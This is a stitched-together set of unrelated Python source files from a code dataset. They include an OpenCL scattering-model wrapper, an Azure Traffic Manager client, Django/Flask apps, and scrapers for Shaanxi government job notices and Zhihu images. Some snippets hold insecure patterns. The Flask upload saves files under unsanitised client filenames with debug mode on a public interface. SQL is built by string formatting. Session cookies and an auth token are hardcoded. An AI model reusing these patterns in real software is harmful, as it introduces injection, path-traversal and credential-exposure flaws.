mf.COPY_HOST_PTR, hostbuf=self.qx)\n self.qy_b = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=self.qy)\n self.res_b = cl.Buffer(self.ctx, mf.WRITE_ONLY, qx.nbytes)\n self.res = np.empty_like(self.qx)\n\n def eval(self, pars):\n\n bi_thick = GaussianDispersion(int(pars['bi_thick_pd_n']), pars['bi_thick_pd'], pars['bi_thick_pd_nsigma'])\n bi_thick.value, bi_thick.weight = bi_thick.get_weights(pars['bi_thick'], 0, 10000, True)\n\n sum, norm = 0.0, 0.0\n sub = pars['sld_bi'] - pars['sld_sol']\n\n real = np.float32 if self.qx.dtype == np.dtype('float32') else np.float64\n for i in xrange(len(bi_thick.weight)):\n self.prg.LamellarKernel(self.queue, self.qx.shape, None, self.qx_b, self.qy_b, self.res_b, real(bi_thick.value[i]),\n real(pars['scale']), real(sub), np.uint32(self.qx.size))\n cl.enqueue_copy(self.queue, self.res, self.res_b)\n\n sum += bi_thick.weight[i]*self.res\n norm += bi_thick.weight[i]\n\n return sum/norm + pars['background']\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Models/code_lamellar.py","file_name":"code_lamellar.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"308268206","text":"#---------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n#---------------------------------------------------------------------------------------------\n#pylint: skip-file\n\n# coding=utf-8\n# --------------------------------------------------------------------------\n# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.pipeline import ClientRawResponse\nfrom msrestazure.azure_exceptions import CloudError\nfrom msrestazure.azure_operation import AzureOperationPoller\nimport uuid\n\nfrom .. import models\n\n\nclass TrafficManagerProfileOperations(object):\n \"\"\"TrafficManagerProfileOperations operations.\n\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An objec model deserializer.\n \"\"\"\n\n def __init__(self, client, config, serializer, deserializer):\n\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n\n self.config = config\n\n def create_or_update(\n self, resource_group_name, deployment_name, routing_method, traffic_manager_profile_name, unique_dns_name, content_version=None, location=\"global\", monitor_path=\"/\", monitor_port=80, monitor_protocol=\"http\", status=\"enabled\", ttl=30, custom_headers=None, raw=False, **operation_config):\n \"\"\"\n Create or update a virtual machine.\n\n :param resource_group_name: The name of the resource group. The name\n is case insensitive.\n :type resource_group_name: str\n :param deployment_name: The name of the deployment.\n :type deployment_name: str\n :param routing_method: Routing method. Possible values include:\n 'priority', 'performance', 'weighted'\n :type routing_method: str or :class:`routingMethod\n <trafficmanagerprofilecreationclient.models.routingMethod>`\n :param traffic_manager_profile_name: Name of resource.\n :type traffic_manager_profile_name: str\n :param unique_dns_name: Relative DNS name for the traffic manager\n profile, resulting FQDN will be <uniqueDnsName>.trafficmanager.net,\n must be globally unique.\n :type unique_dns_name: str\n :param content_version: If included it must match the ContentVersion\n in the template.\n :type content_version: str\n :param location: Location for traffic manager or 'global'.\n :type location: str\n :param monitor_path: Path to monitor.\n :type monitor_path: str\n :param monitor_port: Port to monitor.\n :type monitor_port: int\n :param monitor_protocol: Monitor protocol. Possible values include:\n 'http', 'https'\n :type monitor_protocol: str or :class:`monitorProtocol\n <trafficmanagerprofilecreationclient.models.monitorProtocol>`\n :param status: Create an enabled or disabled profile. Possible values\n include: 'enabled', 'disabled'\n :type status: str or :class:`status\n <trafficmanagerprofilecreationclient.models.status>`\n :param ttl: DNS Config time-to-live in seconds.\n :type ttl: int\n :param dict custom_headers: headers that will be added to the request\n :param bool raw: returns the direct response alongside the\n deserialized response\n :rtype:\n :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`\n instance that returns :class:`DeploymentExtended\n <default.models.DeploymentExtended>`\n :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`\n if raw=true\n \"\"\"\n parameters = models.DeploymentTrafficManagerProfile(content_version=content_version, location=location, monitor_path=monitor_path, monitor_port=monitor_port, monitor_protocol=monitor_protocol, routing_method=routing_method, status=status, traffic_manager_profile_name=traffic_manager_profile_name, ttl=ttl, unique_dns_name=unique_dns_name)\n\n # Construct URL\n url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\\w\\._]+$'),\n 'deploymentName': self._serialize.url(\"deployment_name\", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\\w\\._]+$'),\n 'subscriptionId': self._serialize.url(\"self.config.subscription_id\", self.config.subscription_id, 'str')\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {}\n query_parameters['api-version'] = self._serialize.query(\"self.config.api_version\", self.config.api_version, 'str')\n\n # Construct headers\n header_parameters = {}\n header_parameters['Content-Type'] = 'application/json; charset=utf-8'\n if self.config.generate_client_request_id:\n header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())\n if custom_headers:\n header_parameters.update(custom_headers)\n if self.config.accept_language is not None:\n header_parameters['accept-language'] = self._serialize.header(\"self.config.accept_language\", self.config.accept_language, 'str')\n\n # Construct body\n body_content = self._serialize.body(parameters, 'DeploymentTrafficManagerProfile')\n\n # Construct and send request\n def long_running_send():\n\n request = self._client.put(url, query_parameters)\n return self._client.send(\n request, header_parameters, body_content, **operation_config)\n\n def get_long_running_status(status_link, headers=None):\n\n request = self._client.get(status_link)\n if headers:\n request.headers.update(headers)\n return self._client.send(\n request, header_parameters, **operation_config)\n\n def get_long_running_output(response):\n\n if response.status_code not in [200, 201]:\n exp = CloudError(response)\n exp.request_id = response.headers.get('x-ms-request-id')\n raise exp\n\n deserialized = None\n\n if response.status_code == 200:\n deserialized = self._deserialize('DeploymentExtended', response)\n if response.status_code == 201:\n deserialized = self._deserialize('DeploymentExtended', response)\n\n if raw:\n client_raw_response = ClientRawResponse(deserialized, response)\n return client_raw_response\n\n return deserialized\n\n if raw:\n response = long_running_send()\n return get_long_running_output(response)\n\n long_running_operation_timeout = operation_config.get(\n 'long_running_operation_timeout',\n self.config.long_running_operation_timeout)\n return AzureOperationPoller(\n long_running_send, get_long_running_output,\n get_long_running_status, long_running_operation_timeout)\n","sub_path":"src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_traffic_manager_profile/lib/operations/traffic_manager_profile_operations.py","file_name":"traffic_manager_profile_operations.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360187338","text":"# -*- coding:utf-8 -*-\nimport optparse\nimport urllib\n\nfrom fake_useragent import UserAgent\n# from newspaper import Article\nfrom urllib import parse\n# -*- coding:utf-8 -*-\nfrom fake_useragent import UserAgent\nimport bs4\nfrom newspaper import Article\nimport requests #爬取网页的库\nfrom bs4 import BeautifulSoup #用于解析网页的库\nimport time\nimport random\nimport nltk\nimport xlrd\nimport requests #爬取网页的库\nimport re\nfrom urllib import parse\nfrom bs4 import BeautifulSoup #用于解析网页的库\nimport time\nimport pymysql\nfrom scrapy import signals\nfrom twisted.enterprise import adbapi\nfrom pymysql import cursors\nimport random\nfrom FindChildLinks import AnalysisLinks\nfrom FindChildLinks import getSecondLink\nfrom FindChildLinks import getThreeLink\n\nfrom ParentLevel import JudgeCurrentLevel\nfrom ExtractText import getTextFromLink\n# 判断二级链接是否具有域名,没有的话需要拼接,返回二级的http链接\ndef Analysis(url):\n linkTest = parse.urlparse(url)\n\n print('1.result.scheme : 网络协议')\n print(linkTest.scheme)\n\n print('2.result.netloc: 服务器位置(也有可能是用户信息)')\n print(linkTest.netloc)\n\n print('3.result.path: 网页文件在服务器中的位置')\n print(linkTest.path)\n\n print('4.result.params: 可选参数')\n print(linkTest.params)\n\n print('5.result.query: &连接键值对')\n print(linkTest.query)\n\n print('result.fragment:')\n print(linkTest.fragment)\n\n\n\n# 判断二级链接是否具有域名,没有的话需要拼接,返回二级的http链接\ndef GetLinkHasNetloc(firstlink,childlink):\n linkTest = parse.urlparse(childlink)\n # 如果域名不为空,说明是全部路径\n if (linkTest.netloc != \"\"):\n return childlink\n # 非全路径\n else:\n my_url = parse.urlparse(firstlink)\n if (childlink[:1] == '.'):\n rightLink = my_url.netloc + my_url.path + childlink[1:]\n if('//' in rightLink):\n rightLink = rightLink.replace('//', '/')\n resultLink = my_url.scheme + '://' + rightLink\n if('index.html' in resultLink):\n resultLink = resultLink.replace('/index.html','')\n return resultLink\n else:\n rightLink = my_url.netloc + my_url.path + childlink[1:]\n if ('//' in rightLink):\n rightLink = rightLink.replace('//', '/')\n resultLink = my_url.scheme + '://' + rightLink\n if(my_url.netloc in resultLink):\n return resultLink\n\n\n\n\n# 使用类创建结构体\nclass urlNode(object):\n class Struct(object):\n def __init__(self, url,title,status,preurl):\n self.url = url\n self.title = title\n self.status = status\n self.preurl = preurl\n\n def make_struct(self, url,title,status,preurl):\n return self.Struct(url,title,status,preurl)\n\nurlNode = urlNode()\n\n# 包含需要正文的链接集合\nfirstresult = set()\n\n# 包含可能出现有效子链接的集合\nsecondresult = set()\n\n# 更多内容\nmoreresult = set()\n\n# 判断链接是否有效的list\ninvalidLink = ['logout','login','void','javascript','void(0)','#','(0)']\n\n\n# 判断是否可能包含有效子链接的判断条件\npossibleUse = ['公示公告', '公告栏', '通知公告', '考录', '招聘','招考','招录']\n\n\ndef analysisurl(testurl):\n # 构造请求头\n urllist = [\n r\"https://gitbook.cn/gitchat/columns?page=1&searchKey=&tag=\",\n r\"https://gitbook.cn/gitchat/columns?page=2&searchKey=&tag=\",\n r\"https://gitbook.cn/gitchat/columns?page=3&searchKey=&tag=\",\n r\"https://gitbook.cn/gitchat/columns?page=4&searchKey=&tag=\",\n ]\n\n agent1 = \"Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36\"\n agent2 = \"Mozilla/5.0 (Linux; Android 8.1; EML-AL00 Build/HUAWEIEML-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.143 Crosswalk/24.53.595.0 XWEB/358 MMWEBSDK/23 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN\"\n agent3 = \"Mozilla/5.0 (Linux; U; Android 8.0.0; zh-CN; MHA-AL00 Build/HUAWEIMHA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.1.4.994 Mobile Safari/537.36\"\n agent4 = \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\"\n agent5 = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n list1 = [agent1, agent2, agent3, agent4, agent5]\n\n agent = random.choice(list1)\n try:\n # 构造请求头信息\n headers = {\n \"User-Agent\": agent,\n \"Cookie\": \"__guid=54589117.3355346342630053000.1545469390794.6116; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1545469392; _ga=GA1.2.525028080.1545469392; customerId=5c1dfddd1c648b470dce01bc; customerToken=7094f880-05c8-11e9-b37a-bbc022d7aefd; customerMail=; isLogin=yes; __utmz=54589117.1550903385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54589117.525028080.1545469392.1550986423.1551265116.3; _gid=GA1.2.1073060500.1552831283; aliyungf_tc=AQAAAD/RilUP4wcAn/Q5cZh/y5cvhjrW; connect.sid=s:dBSjH13Adl1RlFsC2zZlAxGDmFh2kF_F.Yf52AS5i06bgo8lsniQWt1F4NtgmI3rOrmjBIiLwR6Q; SERVER_ID=5aa5eb5e-f0eda04d; Hm_lvt_5667c6d502e51ebd8bd9e9be6790fb5d=1551698067,1551698230,1552831282,1552908428; monitor_count=29; Hm_lpvt_5667c6d502e51ebd8bd9e9be6790fb5d=1552909773\"\n }\n response = requests.get(testurl, headers=headers) # 获取网页数据\n response.encoding = response.apparent_encoding # 当获取的网页有乱码时加\n soup = BeautifulSoup(response.text, 'html.parser')\n bf = soup.find('div', class_='view TRS_UEDITOR trs_paper_default trs_web')\n return soup\n except:\n print(\"服务器拒绝连接........\")\n print(\"让我休息5秒钟啊!!!\")\n print(\"ZZzzzz...\")\n time.sleep(5)\n print(\"做了个美美的梦,睡的很好, 那我们继续吧...\")\n\n# 判断具备有效招聘信息的1级链接,含有公告专栏的1��链接\ndef getresult(testurl):\n soup = analysisurl(testurl)\n for x in soup.find_all('a',href = True):\n if(x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(testurl, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if(isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if('招聘' in title):\n node1 = urlNode.make_struct(url,title,1,testurl)\n firstresult.add(node1)\n isincludeUse = any(word if word in title else False for word in possibleUse)\n if (isincludeUse):\n print('我有可能具备有效的子链接哦: ' + title + ' ' + url)\n node2 = urlNode.make_struct(url,title,1,testurl)\n secondresult.add(node2)\n\n# 可能具备有效招聘信息的1级链接\ndef getresultFromSecondresult(setArray):\n for key in setArray:\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 2, key.url)\n firstresult.add(node3)\n if('更多' in title):\n node4 = urlNode.make_struct(url, title, 2, key.url)\n moreresult.add(node4)\n\n# 一级链接中,可能含有二级链接的链接跳转更多\ndef getresultFromMoreresult(setArray):\n for key in setArray:\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 3, key.url)\n firstresult.add(node3)\n\n# 当前的所有链接中,可能还有有效的文本,也就是4级别,这个仅判断firstresult即可\ndef getresultFromMoreresult(setArray):\n for key in setArray:\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 3, key.url)\n firstresult.add(node3)\n\n\n\ndef getresultFromFirstresult(setArray):\n for key in setArray.copy():\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n pass\n else:\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 4, key.url)\n firstresult.add(node3)\n # 如果这个下面还有招聘,则说明现在的链接可以删除了\n\n\ndb = pymysql.connect(host='localhost',\n port=3306,\n user='root',\n password='12345678',\n db='shanxiyuan',\n charset='utf8'\n ) # 连接数据库\n\ncursor = db.cursor()\ncursor.execute(\"DROP TABLE IF EXISTS ExaminationSituation\")\n\nsql = \"\"\"CREATE TABLE ExaminationSituation (\n ID INT PRIMARY KEY AUTO_INCREMENT,\n PARENTID INT(11),\n LINK VARCHAR(255),\n TITLE VARCHAR(255),\n TEXT TEXT\n )\"\"\"\n\ntry:\n cursor = db.cursor()\n cursor.execute(sql)\nexcept:\n db.ping()\n cursor = db.cursor()\n cursor.execute(sql)\n\ndef main():\n print('this message is from main function')\n testurl = 'http://www.shaanxi.gov.cn/'\n print(testurl)\n getresult(testurl)\n print('=' * 40)\n getresultFromSecondresult(secondresult)\n print('=' * 40)\n getresultFromMoreresult(moreresult)\n print('=' * 40)\n print(\"结果\")\n count = 1\n getresultFromFirstresult(firstresult)\n for key in firstresult:\n # print(\"标题%d:\" %count +\" 级别:%d\"% key.status + \" \" + key.title + \" 链接 :\" + key.url + \" 父链接 :\" + key.preurl)\n count = count + 1\n a = Article(key.url, language='zh')\n a.download()\n a.parse()\n db.ping(reconnect=True)\n status = 2;\n sqlw = \"\"\"INSERT INTO ExaminationSituation (PARENTID,LINK, TITLE, TEXT) VALUES (%d,%s,%s,%s)\"\"\"\n data = (key.status, \"'%s'\" % key.url, \"'%s'\" % key.title, \"'%s'\" % a.text)\n\n try:\n cursor.execute(sqlw % data)\n db.commit()\n print('插入数据成功')\n except:\n db.rollback()\n print(\"插入数据失败\")\n db.close()\n\n print('=' * 40)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"思路2-根据级别数目/多个数据源.py","file_name":"多个数据源.py","file_ext":"py","file_size_in_byte":13118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119256627","text":"from django.urls import path\nfrom subreddit.views import add_subreddit, subredditview, subreddithot, subredditnew, subscribe, unsubscribe\n\n\nurlpatterns = [\n path('addsubreddit/', add_subreddit, name='addsubreddit'),\n path('r/<str:name>/', subredditview, name='subreddit'),\n path('r/<str:name>/new/', subredditnew, name='subredditnew'),\n path('r/<str:name>/hot/', subreddithot, name='subreddithot'),\n path('subscribed/<int:id>/', subscribe, name='subscribe'),\n path('unsubscribed/<int:id>/', unsubscribe, name='unsubscribe')\n]\n","sub_path":"subreddit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154106903","text":"from django.conf.urls.defaults import *\nfrom tastypie.api import Api\nfrom main.api import EntryResource, UserResource\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nv1_api = Api(api_name='v1')\nv1_api.register(UserResource())\nv1_api.register(EntryResource())\n\n\nurlpatterns = patterns('',\n url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'app/login.html'}),\n url(r'^logout/$', 'main.views.logout_view'),\n (r'^admin/', include(admin.site.urls)),\n (r'^api/', include(v1_api.urls)),\n)","sub_path":"restAPI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47936401","text":"# Author Balbir Singh <balbir@aol.in>\n# Date 12th September 2015\n\nimport os\nfrom flask import Flask, request, redirect, url_for\n\nUPLOAD_FOLDER = '/Users/basingh/Desktop/'\nALLOWED_EXTENSIONS = set(['txt','zip','pdf'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n file_upload = request.files['file']\n if file_upload and allowed_file(file_upload.filename):\n filename = file_upload.filename\n file_upload.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('index'))\n return \"\"\"\n <!doctype html>\n <title>Upload new File\n

Upload new File

\n
\n

\n \n

\n

%s

\n \"\"\" % \"
\".join(os.listdir(app.config['UPLOAD_FOLDER'],))\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5001, debug=True)","sub_path":"python/Flask/Misc/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286127863","text":"import requests,json,urllib\nfrom bs4 import BeautifulSoup\nimport os\n\n#爬取知乎\n\ndef dealHTML(questionID,array):\n #处理网页返回的2条数据\n header={\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding':'gzip, deflate, br',\n }\n response = requests.get('https://www.zhihu.com/question/%s'%questionID,headers=header)\n\n soup = BeautifulSoup(response.text, \"lxml\")\n\n list = soup.find_all(attrs={\"class\": \"List-item\"})\n\n for item in list:\n content = item.find_all(attrs={'class':'RichText CopyrightRichText-richText'})\n noscripts = content[0].find_all('noscript')\n for noscript in noscripts:\n noscriptContent = noscript.contents[0]\n dict = noscriptContent.attrs\n if 'data-original' in dict:\n array.append(dict['data-original'])\n elif 'src' in dict:\n array.append(dict['src'])\n\ndef dealJsonAnswers(questionID,array):\n #请求剩下的回答列表\n session = requests.session()\n header = {\n 'Connection': 'Keep-Alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'Accept-Encoding': 'gzip, deflate',\n 'accept': 'application/json, text/plain, */*',\n 'Host': 'www.zhihu.com',\n 'DNT': '1',\n 'X-UDID': 'AGAAo4ucJgqPTt2zZ-tXDbRGYiu2WbVI6vU=',\n 'authorization': 'oauth c3cef7c66a1843f8b3a9e6a1e3160e20',\n }\n\n xrsfResponse = session.post('http://www.zhihu.com/', headers=header)\n\n if xrsfResponse.status_code == 200:\n postDict = {\n 'offset': '2',\n 'limit': '100',\n 'sort_by': 'default',\n 'include': 'data[*].is_normal,admin_closed_comment,reward_info,is_collapsed,annotation_action,annotation_detail,collapse_reason,is_sticky,collapsed_by,suggest_edit,comment_count,can_comment,content,editable_content,voteup_count,reshipment_settings,comment_permission,created_time,updated_time,review_info,question,excerpt,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp,upvoted_followees;data[*].mark_infos[*].url;data[*].author.follower_count,badge[?(type=best_answerer)].topics',\n }\n\n answerRequest = session.get('https://www.zhihu.com/api/v4/questions/%s/answers'%questionID, headers=header,params=postDict)\n\n if answerRequest.status_code == 200:\n content = json.loads(answerRequest.text)\n data = content['data']\n\n for answer in data:\n answerContent = answer['content']\n\n strings = answerContent.split('\\\"')\n for str in set(strings):\n if str.find('http') != -1 and str.find('_r') != -1:\n array.append(str)\n\n\nif __name__ == '__main__':\n questionIDs = ['31284878','58604214','31079801','23622114','27364360','30338288']\n\n urlArray = []\n for questionID in questionIDs:\n dealHTML(questionID,urlArray)\n dealJsonAnswers(questionID,urlArray)\n\n #判断文件夹是否存在\n path = os.getcwd() + '/img'\n if not os.path.exists(path):\n os.makedirs(path)\n\n imageCount = 0\n for url in urlArray:\n print('下载'+str(imageCount)+'====='+url)\n urllib.request.urlretrieve(url, os.getcwd()+'/img/%s.jpg' % imageCount)\n imageCount+=1","sub_path":"First.py","file_name":"First.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514148413","text":"import time\nimport torch\nfrom .train_step import train_one_epoch\nfrom .eval_step import evaluate\nimport Utils.detr_misc as utils\nimport os\nimport json\nimport datetime\n\n\ndef training_loop(args, train_config, actor, data_loader_train, data_loader_val):\n output_dir: str = args.output_dir\n\n print(\"Start training\")\n start_time = time.time()\n device = torch.device(args.device)\n for epoch in range(args.start_epoch, train_config['train']['epochs']):\n train_stats = train_one_epoch(actor, data_loader_train, device, epoch,\n train_config['train']['clip_max_norm'])\n actor.new_epoch()\n if output_dir:\n checkpoint_paths = [os.path.join(output_dir, 'checkpoint.pth')]\n # extra checkpoint before LR drop and every 100 epochs\n if (epoch + 1) % train_config['train']['lr_drop'] == 0 or (epoch + 1) % 100 == 0:\n checkpoint_paths.append(os.path.join(output_dir, f'checkpoint{epoch:04}.pth'))\n for checkpoint_path in checkpoint_paths:\n utils.save_on_master(actor.state_dict(), checkpoint_path)\n\n test_stats = evaluate(actor, data_loader_val, device)\n\n log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},\n **{f'test_{k}': v for k, v in test_stats.items()},\n 'epoch': epoch,\n 'n_parameters': actor.n_parameters()}\n\n if args.output_dir and utils.is_main_process():\n with open(os.path.join(output_dir, \"log.txt\"), \"a\") as f:\n f.write(json.dumps(log_stats) + \"\\n\")\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n","sub_path":"training/old/deform_detr_tracking/multires_siamfc_frontend/training_loop.py","file_name":"training_loop.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191749693","text":"# sweetscomplete.entity.custmoer.Customer test\n\n# tell python where to find module source code\nimport os,sys\ninclude_path = os.path.realpath('./src')\nif not os.path.exists(include_path) :\n include_path = os.path.realpath('../src')\n if not os.path.exists(include_path) :\n include_path = os.path.realpath('../../src')\n if not os.path.exists(include_path) :\n include_path = os.path.realpath('../../../src')\nsys.path.append(include_path)\nimport json\nimport unittest\nfrom sweetscomplete.entity.customer import Customer\n\nclass TestCustomer(unittest.TestCase) :\n\n customerFromDict = None\n customerDefaults = None\n customerFromJson = None\n\n testDict = dict({\n 'customerKey' : '00000000',\n 'firstName' : 'Fred',\n 'lastName' : 'Flintstone',\n 'phoneNumber' : '+1-222-333-4444',\n 'email' : 'fred@slate.com',\n 'socialMedia' : {'FB':'https://facebook.com/fred.flintstone','LI':'https://linkedin.com/fflintstone'},\n 'streetAddressOfBuilding' : '123 Rocky Way',\n 'buildingName' : 'House',\n 'city' : 'Bedrock',\n 'stateProvince' : 'ZZ',\n 'locality' : 'Pre Historic',\n 'country' : 'ZZ',\n 'postalCode' : '00000',\n 'latitude' : 11.1111,\n 'longitude' : -11.1111,\n 'userName' : 'freddy',\n 'password' : '12345',\n 'secondaryPhoneNumbers' : ['+1-333-444-5555'],\n 'secondaryEmailAddresses' : ['freddy@flintstone.com','ace@bowling.com'],\n 'dateOfBirth' : '0000-00-00',\n 'gender' : 'M'\n })\n\n testJson = '''{\n \"customerKey\" : \"00000000\",\n \"firstName\" : \"Fred\",\n \"lastName\" : \"Flintstone\",\n \"phoneNumber\" : \"+1-222-333-4444\",\n \"email\" : \"fred@slate.com\",\n \"socialMedia\" : {\"FB\":\"https://facebook.com/fred.flintstone\",\"LI\":\"https://linkedin.com/fflintstone\"},\n \"streetAddressOfBuilding\" : \"123 Rocky Way\",\n \"buildingName\" : \"House\",\n \"city\" : \"Bedrock\",\n \"stateProvince\" : \"ZZ\",\n \"locality\" : \"Pre Historic\",\n \"country\" : \"ZZ\",\n \"postalCode\" : \"00000\",\n \"latitude\" : 11.1111,\n \"longitude\" : -11.1111,\n \"userName\" : \"freddy\",\n \"password\" : \"12345\",\n \"secondaryPhoneNumbers\" : [\"+1-333-444-5555\"],\n \"secondaryEmailAddresses\" : [\"freddy@flintstone.com\",\"ace@bowling.com\"],\n \"dateOfBirth\" : \"0000-00-00\",\n \"gender\" : \"M\"\n }'''\n\n def setUp(self) :\n self.customerFromDict = Customer(self.testDict)\n self.customerDefaults = Customer(True)\n self.customerFromJson = Customer(self.testJson)\n\n def test_customer_from_dict(self) :\n expected = '00000000'\n actual = self.customerFromDict.getKey()\n self.assertEqual(expected, actual)\n\n def test_customer_from_dict_get_and_set(self) :\n self.customerFromDict.set('skuNumber', '99999999')\n expected = '99999999'\n actual = self.customerFromDict.get('skuNumber')\n self.assertEqual(expected, actual)\n\n def test_customer_from_json(self) :\n expected = '00000000'\n actual = self.customerFromJson.getKey()\n self.assertEqual(expected, actual)\n\n def test_customer_from_blank(self) :\n expected = ''\n actual = self.customerDefaults.getKey()\n self.assertEqual(expected, actual)\n\ndef main() :\n unittest.main()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"chapters/04/test/sweetscomplete/entity/test_customer.py","file_name":"test_customer.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137453307","text":"import torch\nfrom . import model\nfrom .metric import MultiImageMetric, Union, List\nfrom . import utils\nimport torch.nn.functional as F\nimport numpy as np\n\n__all__ = ['FID']\n\n\nclass FID(MultiImageMetric):\n def __init__(self, input_type, eps=1e-6) -> None:\n super().__init__()\n if input_type not in ['image', 'feature']:\n msg = 'input_type should be image or feature, but got {}'.format(\n input_type)\n raise 